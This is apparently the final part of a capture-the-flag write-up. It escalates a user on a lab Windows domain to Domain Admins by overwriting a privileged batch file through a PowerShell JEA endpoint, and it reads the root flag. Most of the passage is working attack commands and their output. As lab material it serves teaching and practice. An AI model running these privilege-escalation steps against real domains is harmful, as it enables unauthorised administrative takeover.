Comment Only in the event of emergencies is this to be populated. This has access to Domain Admin group
MembersPrivilege Escalation (Domain Admins)
Add user to this site_admin group
PS C:\Windows\system32> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { Set-Content -Path '/Program Files/keepmeon/letmein.bat' -Value 'net group site_admin awallace /add /domain' }
PS C:\Windows\system32> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { cat '/Program Files/keepmeon/letmein.bat' }
net group site_admin awallace /add /domainAfter 5minutes we are added to the group
PS C:\Windows\system32> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { net user awallace /domain }
User name awallace
Full Name Aileen Wallace
Local Group Memberships
Global Group memberships *Domain Users *Managers *Site_AdminUpgrade to Domain Admins
PS C:\Windows\system32> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { net group "Domain Admins" awallace /add /domain }PS C:\Windows\system32> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { ls /Users -Rec }
...
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name PSComputerName
---- ------------- ------ ---- --------------
-ar--- 20/12/2024 16:51 34 root.txt ATSSERVER
Directory: C:\Users\Administrator\Documents
Mode LastWriteTime Length Name PSComputerName
---- ------------- ------ ---- --------------
-a---- 30/01/2022 18:54 320 Clear-Admins.ps1 ATSSERVER
Directory: C:\Users\imonks\Desktop
Mode LastWriteTime Length Name PSComputerName
---- ------------- ------ ---- --------------
-ar--- 20/12/2024 16:51 34 user.txt ATSSERVER
-a---- 20/12/2024 19:34 691 wm.ps1 ATSSERVER
...Root.txt
PS C:\Windows\system32> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { cat /Users/Administrator/Desktop/root.txt }
31fc4f59e57da529b2924f4d1dc1ee41Admin Script
PS C:\Windows\system32> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { cat /Users/Administrator/Documents/Clear-Admins.ps1 }
Import-Module ActiveDirectory
Get-ADGroupMember 'site_admin' | ForEach-Object {Remove-ADGroupMember 'site_admin' $_ -Confirm:$false}
Get-ADGroupMember 'Domain Admins' | ForEach-Object {Remove-ADGroupMember 'Domain Admins' $_ -Confirm:$false}
Add-ADGroupMember -Identity 'Domain Admins' -Members Site_admin,AdministratorLast updated